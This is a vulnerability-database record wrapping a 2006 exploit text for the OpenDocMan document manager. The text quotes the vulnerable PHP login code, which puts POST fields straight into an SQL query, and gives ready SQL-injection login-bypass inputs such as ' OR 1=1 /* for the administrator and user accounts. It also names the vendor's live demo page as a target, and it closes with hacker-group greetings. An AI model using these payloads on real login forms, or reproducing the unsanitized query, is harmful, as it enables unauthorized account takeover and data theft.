DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:51476", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "opendocman-1.2rc3.txt", "description": "", "published": "2006-10-30T00:00:00", "modified": "2006-10-30T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/51476/opendocman-1.2rc3.txt.html", "reporter": "k1tk4t", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:27:49", "viewCount": 10, "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.3}, "_state": {"dependencies": 1678912101, "score": 1678911848, "epss": 1678924918}, "_internal": {"score_hash": "6078bbe7364e71d5afd63d6099c06ae4"}, "sourceHref": "https://packetstormsecurity.com/files/download/51476/opendocman-1.2rc3.txt", "sourceData": "`######################################################################## \n# opendocman <= 1.2rc3 Bypass admin/user Login \n# affected to opendocman-1.2p3 \n# Download Source : http://www.opendocman.com/ \n# \n# Found By : k1tk4t - k1tk4t[4t]newhack.org \n# Location : Indonesia -- #newhack[dot]org @irc.dal.net \n######################################################################## \nfile; \nindex.php \n######################################################################## \nbugs; \n$frmuser = $_POST['frmuser']; \n$frmpass = $_POST['frmpass']; \n$query = \"SELECT id, username, password FROM user WHERE username = \n'$frmuser' AND password = password('$frmpass')\"; $result = \nmysql_query(\"$query\") or die (\"Error in query: $query. \" . mysql_error()); \n$result = mysql_query(\"$query\") or die (\"Error in query: $query. \" \n. mysql_error()); \n######################################################################## \nexploit/POC; \nif magic_quotes_gpc = Off -- u can do this; \n \nfor opendocman-1.2rc3 \nLogin administrator \nusername : ' OR 1=1 /* \npassword : blank \n \nLogin User \nusername : username' /* \npassword : blank \n \nopendocman-1.2p3 \nLogin Form \nusername : admin' /* \npassword : blank \nin opendocman-1.2p3 use; \nif(!valid_username($_POST['frmuser'] \nso u just bypass login username existing in database \nhttp://www.opendocman.com/demo/index.php \n######################################################################## \nThanks; \nstr0ke \nxoron [www.xoron.biz] \n[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159 \nevilcode,illibero,NoGe,nyubi,x-ace,ghoz, \nhome_edition2001,matdhule,iFX, \nand for all(friend's&enemy) \n@irc.dal.net \n#newhack[dot]org [all member&staff] \n#e-c-h-o [all member echo community] \n#nyubicrew [all member solpotcrew community] \n#asiahacker [all member asiahacker community] \n \n \n-- \nbest regard' \n \nk1tk4t \nhttp://newhack.org \nnewhack[dot]org@irc.dal.net \n`\n"}

{}